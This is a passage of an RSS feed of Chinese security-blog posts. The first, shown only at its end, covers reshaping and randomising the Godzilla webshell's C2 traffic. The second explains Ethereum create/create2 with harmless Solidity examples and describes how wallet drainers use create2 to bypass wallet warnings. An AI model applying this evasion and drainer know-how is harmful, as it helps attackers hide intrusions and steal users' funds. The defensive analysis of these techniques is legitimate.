src="https://wechat2rss.xlab.app/img-proxy/?k=e92a4abd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnL1vojVXkBlqbX6yY1RfbV9W7jXgIfdaJDSYNfVcwVuJRnxl9egdGaw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><br/></p><p><span>在c2channel中我们需要处理好从shellentity获取到的profile值，初始化好模板后，匹配profile规则对数据包进行梳理重构。在一切进行完成后就可通过sendRequest发送请求。</span></p><p><span>在完成到这一步时基本你已经学会了怎么控制哥斯拉发送的数据包格式等操作，具体实现代码就自己想把，抄作业没啥意思。</span></p><p><span>在修改完profile后还可以顺手实现全随机化生成数据包功能，只需要在处理数据包前添加链表通过随机值拼接完整数据包即可。玩法很多还需深入挖掘。</span></p><p><br/></p><p><span>sendRequest大致代码：</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000475" data-ratio="0.7451682176091625" data-w="1397" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=de524360&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dNW6NEKDJlxWdFkALtG7ZnS9aUsEf454GNrkic9L5lNPKENibzb4ua0TqpSg7vUrwOwBKb9YRys1Gw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484126">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=000f2245&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484126%26idx%3D1%26sn%3D5c0c13cae91a89ed5ed9cc075f44f134%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 28 Feb 2024 15:50:00 +0800</pubDate>
    </item>
    <item>
      <title>探究Wallet Drainers使用Create2 Bypass钱包安全告警</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484108&amp;idx=1&amp;sn=aa283a0d37ebca16c3c728a99946265f</link>
      <description>最近链上的TVL很高，Wallet Drainers也越来越活跃了。&#xA;自己简单看了下,感觉蛮有趣的，因为最近手中的事情太多了，就简单记录下。</description>
      <content:encoded><![CDATA[<p>
<span>S7iter</span> <span>2024-01-01 12:34</span> <span style="display: inline-block;">江苏</span>
</p>

<p>最近链上的TVL很高，Wallet Drainers也越来越活跃了。</p>
<p>自己简单看了下,感觉蛮有趣的，因为最近手中的事情太多了，就简单记录下。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=0899c4f0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9dOB6ib2sAp5xCibVPadyiaGYSS8e9pko1dHibXGHqoZcEaibLvI85eXQk8cmZgNEIwtd648HCTW6hRlNw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section data-tool="mdnice编辑器" data-website="https://www.mdnice.com" style="font-size: 16px;color: black;padding-right: 10px;padding-left: 10px;line-height: 1.6;letter-spacing: 0px;word-break: break-word;text-align: left;counter-reset: counterh1 0 counterh2 0 counterh3 0;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;"><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;"><span style="counter-increment: counterh2;color: rgb(159,205,208);border-bottom: 4px solid rgb(159,205,208);font-size: 18px;padding: 2px 4px;">1</span></span><span style="font-size: 18px;border-bottom: 4px solid rgb(37,132,181);padding: 2px 4px;color: rgb(37,132,181);">前言</span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">最近链上的TVL很高，Wallet Drainers也越来越活跃了。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">自己简单看了下,感觉蛮有趣的，因为最近手中的事情太多了，就简单记录下。</p><hr data-tool="mdnice编辑器" style="height: 1px;margin-top: 10px;margin-bottom: 10px;border-right: none;border-bottom: none;border-left: none;border-top-style: solid;border-top-color: rgb(37, 132, 181);"/><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;"><span style="counter-increment: counterh2;color: rgb(159,205,208);border-bottom: 4px solid rgb(159,205,208);font-size: 18px;padding: 2px 4px;">2</span></span><span style="font-size: 18px;border-bottom: 4px solid rgb(37,132,181);padding: 2px 4px;color: rgb(37,132,181);">Create和Create2</span></h2><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">在了解如何bypass钱包的安全告警之前，首先需要了解这一行为的实现，基于Create2</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: inline-block;background-image: linear-gradient(45deg, transparent 48%, rgb(37, 132, 181) 48%, rgb(37, 132, 181) 52%, transparent 52%);background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;width: 24px;height: 24px;margin-bottom: -7px;"></span><span style="font-size: 16px;border-bottom: 1px solid rgb(37,132,181);padding: 2px 10px;color: rgb(37,132,181);">Create</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">EOA可以创建智能合约，智能合约同样也是可以创建智能合约的</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">create</code>通常与<code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">address</code>结合使用，用于在智能合约中创建新的合约实例。通过使用<code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">create</code>，合约可以在其执行期间动态地生成新的合约。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">这边我写一个简单的示例：</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/AYfn0IKjIINBEujcbaFFDJsLAlOMuatsgL7tUVezGxW7Zb5T9nJVibdhbXHuXvhic4ib2zqLSqS50jXBzib0J6lMuIIt09bfz5kJ/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(255, 255, 255);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 15px 16px 16px;display: -webkit-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 12px;background: rgb(255, 255, 255);border-radius: 5px;">contract Factory {<br/>    event NewContract(address indexed createdContract);<br/>    function createNewContract() external {<br/>        // 使用 create 创建新的合约<br/>        address newContract = address(new MyContract());<br/>        emit NewContract(newContract);<br/>    }<br/>}<br/>contract MyContract {<br/>    // 合约的逻辑和状态变量<br/>    address public owner;<br/>    constructor() {<br/>        owner = msg.sender;<br/>    }<br/>    function isOwner() external view returns (bool) {<br/>        return msg.sender == owner;<br/>    }<br/>}<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">首先部署<code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">Factory</code>合约 合约地址为0xa131AD247055FD2e2aA8b156A11bdEc81b9eAD95</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">然后创建新的合约createNewContract，可以看到日志中：</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/AYfn0IKjIINBEujcbaFFDJsLAlOMuatsgL7tUVezGxW7Zb5T9nJVibdhbXHuXvhic4ib2zqLSqS50jXBzib0J6lMuIIt09bfz5kJ/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(255, 255, 255);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 15px 16px 16px;display: -webkit-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 12px;background: rgb(255, 255, 255);border-radius: 5px;">[<br/>	{<br/>		&#34;from&#34;: &#34;0xa131AD247055FD2e2aA8b156A11bdEc81b9eAD95&#34;,<br/>		&#34;topic&#34;: &#34;0x387ea218537e939551af33bbc2dd6c53b1fee55d377a0dce288258f972cb3a9c&#34;,<br/>		&#34;event&#34;: &#34;NewContract&#34;,<br/>		&#34;args&#34;: {<br/>			&#34;0&#34;: &#34;0xc176E14869501dd2B8DCFaAe60Bd022717b6350a&#34;,<br/>			&#34;createdContract&#34;: &#34;0xc176E14869501dd2B8DCFaAe60Bd022717b6350a&#34;<br/>		}soli<br/>	}<br/>]<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">可以看到创建了合约0xc176E14869501dd2B8DCFaAe60Bd022717b6350a</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们再去部署MyContract 可以发现合约地址为0xc176E14869501dd2B8DCFaAe60Bd022717b6350a</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">点击owner为</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/AYfn0IKjIINBEujcbaFFDJsLAlOMuatsgL7tUVezGxW7Zb5T9nJVibdhbXHuXvhic4ib2zqLSqS50jXBzib0J6lMuIIt09bfz5kJ/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(255, 255, 255);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 15px 16px 16px;display: -webkit-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 12px;background: rgb(255, 255, 255);border-radius: 5px;"><span style="color: #c41a16;line-height: 26px;">&#34;0&#34;</span>: <span style="color: #c41a16;line-height: 26px;">&#34;address: 0xa131AD247055FD2e2aA8b156A11bdEc81b9eAD95&#34;</span><br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">owner为创建的合约地址，那么就实现了在合约中创建合约的目的。</p><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: inline-block;background-image: linear-gradient(45deg, transparent 48%, rgb(37, 132, 181) 48%, rgb(37, 132, 181) 52%, transparent 52%);background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;width: 24px;height: 24px;margin-bottom: -7px;"></span><span style="font-size: 16px;border-bottom: 1px solid rgb(37,132,181);padding: 2px 10px;color: rgb(37,132,181);">Create2</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;"><code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">create2</code> 允许合约在指定的地址上创建新的合约实例</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">那么就可以达到“预测”合约地址的方法</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">因为在地址的计算机制中，通常使用<code style="font-size: 14px;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;word-break: break-all;">keccak256</code> 哈希函数计算合约地址</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">create2为我们提供了一个计算地址的salt值，这样我们就可以更加灵活地控制合约地址</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">比如我们使用create2，我们可以在创建合约之前预测新创建的合约地址，如果我们在该地址上预先提供好需要部署的合约，那么就可以达到很多目的，比如：可以进行代币转移，合约升级，恶意合约的部署等等。</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">写一个简单的示例：</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/AYfn0IKjIINBEujcbaFFDJsLAlOMuatsgL7tUVezGxW7Zb5T9nJVibdhbXHuXvhic4ib2zqLSqS50jXBzib0J6lMuIIt09bfz5kJ/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(255, 255, 255);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 15px 16px 16px;display: -webkit-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 12px;background: rgb(255, 255, 255);border-radius: 5px;">contract PredictableContract {<br/>    address public owner;<br/>    <br/>    event ContractCreated(address indexed newContract, address indexed owner);<br/>    <br/>    constructor(address _owner) payable {<br/>        owner = _owner;<br/>    }<br/>    function getOwner() public view returns (address) {<br/>        return owner;<br/>    }<br/>}<br/>contract Factory {<br/>    function deploy(uint _salt) public payable returns (address) {<br/>        bytes32 hash = keccak256(<br/>            abi.encodePacked(<br/>                bytes1(0xff),          <br/>                address(this),         <br/>                _salt,                 <br/>                type(PredictableContract).creationCode <br/>            )<br/>        );<br/>        address newContract = address(uint160(uint256(hash)));<br/>        return address(new PredictableContract{salt: bytes32(_salt)}(msg.sender));<br/>    }<br/>}<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">给salt为66在部署的合约(合约地址0x3596A5B0cb68D61C071d5A535A3B676fB2b7D678)</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">中deploy一个合约</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">可以看到</p><section data-tool="mdnice编辑器" style="overflow-x: auto;"><table><thead><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);background-color: white;"><th style="text-align: left;background-color: rgb(235, 114, 80);color: rgb(248, 248, 248);border-top-width: 1px;border-color: rgb(245, 203, 174);min-width: 85px;">解码输入</th><th style="text-align: left;background-color: rgb(235, 114, 80);color: rgb(248, 248, 248);border-top-width: 1px;border-color: rgb(245, 203, 174);min-width: 85px;">{ &#34;uint256 _salt&#34;: &#34;66&#34; }</th></tr></thead><tbody style="border-width: 0px;border-style: initial;border-color: initial;"><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 204);background-color: white;"><td style="border-color: rgb(245, 203, 174);min-width: 85px;">解码输出</td><td style="border-color: rgb(245, 203, 174);min-width: 85px;">{ &#34;0&#34;: &#34;address: 0xa852De88789ced6c8aF04738Cfb0E444cbb83102&#34; }</td></tr></tbody></table></section><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">得到预测的合约0xa852De88789ced6c8aF04738Cfb0E444cbb83102</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">我们部署到owner合约地址可以看到owner为</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">0xa852De88789ced6c8aF04738Cfb0E444cbb83102</p><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">也可以看下这位师傅写的solidity使用create2预测合约地址｜create2用法｜</p><pre data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;"><span style="display: block;background: url(&#34;https://mmbiz.qpic.cn/mmbiz_svg/AYfn0IKjIINBEujcbaFFDJsLAlOMuatsgL7tUVezGxW7Zb5T9nJVibdhbXHuXvhic4ib2zqLSqS50jXBzib0J6lMuIIt09bfz5kJ/640?wx_fmt=svg&amp;from=appmsg&#34;) 10px 10px / 40px no-repeat rgb(255, 255, 255);height: 30px;width: 100%;margin-bottom: -7px;border-radius: 5px;"></span><code style="overflow-x: auto;padding: 15px 16px 16px;display: -webkit-box;font-family: &#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size: 12px;background: rgb(255, 255, 255);border-radius: 5px;">// SPDX-License-Identifier: MIT<br/>pragma solidity ^0.8.0;<br/>contract ContractDemo {<br/>    address public owner;<br/>    // Only owners can call transactions marked with this modifier<br/>    modifier onlyOwner() {<br/>        require(owner == msg.sender, &#34;Caller is not the owner&#34;);<br/>        _;<br/>    }<br/>    constructor(address _owner) payable {<br/>        owner = _owner;<br/>    }<br/>    function getOwner() public view returns (address) {<br/>        return owner;<br/>    }<br/>    <br/>}<br/>contract Factory {<br/>    // Returns the address of the newly deployed contract<br/>    function deploy(<br/>        uint _salt<br/>    ) public payable returns (address) {<br/>        return address(new ContractDemo{salt: bytes32(_salt)}(msg.sender));<br/>    }<br/>    //  获取待部署合约字节码<br/>    function getBytecode()<br/>        public<br/>        view<br/>        returns (bytes memory)<br/>    {<br/>        bytes memory bytecode = type(ContractDemo).creationCode;<br/>        return abi.encodePacked(bytecode, abi.encode(msg.sender));<br/>    }<br/>    /** 获取待部署合约地址<br/>        params:<br/>            _salt: 随机整数，用于预计算地址<br/>    */ <br/>    function getAddress(uint256 _salt)<br/>        public<br/>        view<br/>        returns (address)<br/>    {<br/>        // Get a hash concatenating args passed to encodePacked<br/>        bytes32 hash = keccak256(<br/>            abi.encodePacked(<br/>                bytes1(0xff), // 0<br/>                address(this), // address of factory contract<br/>                _salt, // a random salt<br/>                keccak256(getBytecode()) // the wallet contract bytecode<br/>            )<br/>        );<br/>        // Cast last 20 bytes of hash to address<br/>        return address(uint160(uint256(hash)));<br/>    }<br/>}<br/></code></pre><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">更多详情:Create2 &amp; Precompute Contract Address with Create2 | Solidity by Example</p><h2 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 22px;"><span style="display: inline-block;"><span style="counter-increment: counterh2;color: rgb(159,205,208);border-bottom: 4px solid rgb(159,205,208);font-size: 18px;padding: 2px 4px;">3</span></span><span style="font-size: 18px;border-bottom: 4px solid rgb(37,132,181);padding: 2px 4px;color: rgb(37,132,181);">Bypass Wallet Warning</span></h2><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: inline-block;background-image: linear-gradient(45deg, transparent 48%, rgb(37, 132, 181) 48%, rgb(37, 132, 181) 52%, transparent 52%);background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;width: 24px;height: 24px;margin-bottom: -7px;"></span><span style="font-size: 16px;border-bottom: 1px solid rgb(37,132,181);padding: 2px 10px;color: rgb(37,132,181);">bypass流程</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">用ScamSniffer的图示 很清晰了，后续我再次捕捉这种基于create2的钓鱼或者攻击手段会更新再这篇</p><figure data-tool="mdnice编辑器" style="margin-top: 10px;margin-bottom: 10px;display: flex;flex-direction: column;justify-content: center;align-items: center;"><img data-imgfileid="100000453" data-ratio="1.0648148148148149" style="display: block;margin-right: auto;margin-left: auto;" data-type="jpeg" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=f9d6736a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9dOB6ib2sAp5xCibVPadyiaGYSKibJFEpXXapOzWQpj1hpic3hHkbP9gAp5BkB8sORFtSJClrDvxKM4bbQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></figure><h3 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;font-weight: bold;font-size: 20px;"><span style="display: inline-block;background-image: linear-gradient(45deg, transparent 48%, rgb(37, 132, 181) 48%, rgb(37, 132, 181) 52%, transparent 52%);background-position: initial;background-size: initial;background-repeat: initial;background-attachment: initial;background-origin: initial;background-clip: initial;width: 24px;height: 24px;margin-bottom: -7px;"></span><span style="font-size: 16px;border-bottom: 1px solid rgb(37,132,181);padding: 2px 10px;color: rgb(37,132,181);">相关事件</span><span style="display: none;"></span></h3><p data-tool="mdnice编辑器" style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;">X 上的 Scam Sniffer | Web3 Anti-Scam：“1/ Here is a real case happened 9 hours ago A victim lost <span style="cursor:pointer;"><span role="presentation" data-formula="927k worth of " data-formula-type="inline-equation" style=""><svg xmlns="http://www.w3.org/2000/svg" role="img" focusable="false" viewBox="0 -705 5645 910" aria-hidden="true" style="vertical-align: -0.464ex;width: 12.771ex;height: 2.059ex;"><g stroke="currentColor" fill="currentColor" stroke-width="0" transform="matrix(1 0 0 -1 0 0)"><g data-mml-node="math"><g data-mml-node="mn"><path data-c="39" d="M352 287Q304 211 232 211Q154 211 104 270T44 396Q42 412 42 436V444Q42 537 111 606Q171 666 243 666Q245 666 249 666T257 665H261Q273 665 286 663T323 651T370 619T413 560Q456 472 456 334Q456 194 396 97Q361 41 312 10T208 -22Q147 -22 108 7T68 93T121 149Q143 149 158 135T173 96Q173 78 164 65T148 49T135 44L131 43Q131 41 138 37T164 27T206 22H212Q272 22 313 86Q352 142 352 280V287ZM244 248Q292 248 321 297T351 430Q351 508 343 542Q341 552 337 562T323 588T293 615T246 625Q208 625 181 598Q160 576 154 546T147 441Q147 358 152 329T172 282Q197 248 244 248Z"></path><path data-c="32" d="M109 429Q82 429 66 447T50 491Q50 562 103 614T235 666Q326 666 387 610T449 465Q449 422 429 383T381 315T301 241Q265 210 201 149L142 93L218 92Q375 92 385 97Q392 99 409 186V189H449V186Q448 183 436 95T421 3V0H50V19V31Q50 38 56 46T86 81Q115 113 136 137Q145 147 170 174T204 211T233 244T261 278T284 308T305 340T320 369T333 401T340 431T343 464Q343 527 309 573T212 619Q179 619 154 602T119 569T109 550Q109 549 114 549Q132 549 151 535T170 489Q170 464 154 447T109 429Z" transform="translate(500, 0)"></path><path data-c="37" d="M55 458Q56 460 72 567L88 674Q88 676 108 676H128V672Q128 662 143 655T195 646T364 644H485V605L417 512Q408 500 387 472T360 435T339 403T319 367T305 330T292 284T284 230T278 162T275 80Q275 66 275 52T274 28V19Q270 2 255 -10T221 -22Q210 -22 200 -19T179 0T168 40Q168 198 265 368Q285 400 349 489L395 552H302Q128 552 119 546Q113 543 108 522T98 479L95 458V455H55V458Z" transform="translate(1000, 0)"></path></g><g data-mml-node="mi" transform="translate(1500, 0)"><path data-c="6B" d="M121 647Q121 657 125 670T137 683Q138 683 209 688T282 694Q294 694 294 686Q294 679 244 477Q194 279 194 272Q213 282 223 291Q247 309 292 354T362 415Q402 442 438 442Q468 442 485 423T503 369Q503 344 496 327T477 302T456 291T438 288Q418 288 406 299T394 328Q394 353 410 369T442 390L458 393Q446 405 434 405H430Q398 402 367 380T294 316T228 255Q230 254 243 252T267 246T293 238T320 224T342 206T359 180T365 147Q365 130 360 106T354 66Q354 26 381 26Q429 26 459 145Q461 153 479 153H483Q499 153 499 144Q499 139 496 130Q455 -11 378 -11Q333 -11 305 15T277 90Q277 108 280 121T283 145Q283 167 269 183T234 206T200 217T182 220H180Q168 178 159 139T145 81T136 44T129 20T122 7T111 -2Q98 -11 83 -11Q66 -11 57 -1T48 16Q48 26 85 176T158 471L195 616Q196 629 188 632T149 637H144Q134 637 131 637T124 640T121 647Z"></path></g><g data-mml-node="mi" transform="translate(2021, 0)"><path data-c="77" d="M580 385Q580 406 599 424T641 443Q659 443 674 425T690 368Q690 339 671 253Q656 197 644 161T609 80T554 12T482 -11Q438 -11 404 5T355 48Q354 47 352 44Q311 -11 252 -11Q226 -11 202 -5T155 14T118 53T104 116Q104 170 138 262T173 379Q173 380 173 381Q173 390 173 393T169 400T158 404H154Q131 404 112 385T82 344T65 302T57 280Q55 278 41 278H27Q21 284 21 287Q21 293 29 315T52 366T96 418T161 441Q204 441 227 416T250 358Q250 340 217 250T184 111Q184 65 205 46T258 26Q301 26 334 87L339 96V119Q339 122 339 128T340 136T341 143T342 152T345 165T348 182T354 206T362 238T373 281Q402 395 406 404Q419 431 449 431Q468 431 475 421T483 402Q483 389 454 274T422 142Q420 131 420 107V100Q420 85 423 71T442 42T487 26Q558 26 600 148Q609 171 620 213T632 273Q632 306 619 325T593 357T580 385Z"></path></g><g data-mml-node="mi" transform="translate(2737, 0)"><path data-c="6F" d="M201 -11Q126 -11 80 38T34 156Q34 221 64 279T146 380Q222 441 301 441Q333 441 341 440Q354 437 367 433T402 417T438 387T464 338T476 268Q476 161 390 75T201 -11ZM121 120Q121 70 147 48T206 26Q250 26 289 58T351 142Q360 163 374 216T388 308Q388 352 370 375Q346 405 306 405Q243 405 195 347Q158 303 140 230T121 120Z"></path></g><g data-mml-node="mi" transform="translate(3222, 0)"><path data-c="72" d="M21 287Q22 290 23 295T28 317T38 348T53 381T73 411T99 433T132 442Q161 442 183 430T214 408T225 388Q227 382 228 382T236 389Q284 441 347 441H350Q398 441 422 400Q430 381 430 363Q430 333 417 315T391 292T366 288Q346 288 334 299T322 328Q322 376 378 392Q356 405 342 405Q286 405 239 331Q229 315 224 298T190 165Q156 25 151 16Q138 -11 108 -11Q95 -11 87 -5T76 7T74 17Q74 30 114 189T154 366Q154 405 128 405Q107 405 92 377T68 316T57 280Q55 278 41 278H27Q21 284 21 287Z"></path></g><g data-mml-node="mi" transform="translate(3673, 0)"><path data-c="74" d="M26 385Q19 392 19 395Q19 399 22 411T27 425Q29 430 36 430T87 431H140L159 511Q162 522 166 540T173 566T179 586T187 603T197 615T211 624T229 626Q247 625 254 615T261 596Q261 589 252 549T232 470L222 433Q222 431 272 431H323Q330 424 330 420Q330 398 317 385H210L174 240Q135 80 135 68Q135 26 162 26Q197 26 230 60T283 144Q285 150 288 151T303 153H307Q322 153 322 145Q322 142 319 133Q314 117 301 95T267 48T216 6T155 -11Q125 -11 98 4T59 56Q57 64 57 83V101L92 241Q127 382 128 383Q128 385 77 385H26Z"></path></g><g data-mml-node="mi" transform="translate(4034, 0)"><path data-c="68" d="M137 683Q138 683 209 688T282 694Q294 694 294 685Q294 674 258 534Q220 386 220 383Q220 381 227 388Q288 442 357 442Q411 442 444 415T478 336Q478 285 440 178T402 50Q403 36 407 31T422 26Q450 26 474 56T513 138Q516 149 519 151T535 153Q555 153 555 145Q555 144 551 130Q535 71 500 33Q466 -10 419 -10H414Q367 -10 346 17T325 74Q325 90 361 192T398 345Q398 404 354 404H349Q266 404 205 306L198 293L164 158Q132 28 127 16Q114 -11 83 -11Q69 -11 59 -2T48 16Q48 30 121 320L195 616Q195 629 188 632T149 637H128Q122 643 122 645T124 664Q129 683 137 683Z"></path></g><g data-mml-node="mi" transform="translate(4610, 0)"><path data-c="6F" d="M201 -11Q126 -11 80 38T34 156Q34 221 64 279T146 380Q222 441 301 441Q333 441 341 440Q354 437 367 433T402 417T438 387T464 338T476 268Q476 161 390 75T201 -11ZM121 120Q121 70 147 48T206 26Q250 26 289 58T351 142Q360 163 374 216T388 308Q388 352 370 375Q346 405 306 405Q243 405 195 347Q158 303 140 230T121 120Z"></path></g><g data-mml-node="mi" transform="translate(5095, 0)"><path data-c="66" d="M118 -162Q120 -162 124 -164T135 -167T147 -168Q160 -168 171 -155T187 -126Q197 -99 221 27T267 267T289 382V385H242Q195 385 192 387Q188 390 188 397L195 425Q197 430 203 430T250 431Q298 431 298 432Q298 434 307 482T319 540Q356 705 465 705Q502 703 526 683T550 630Q550 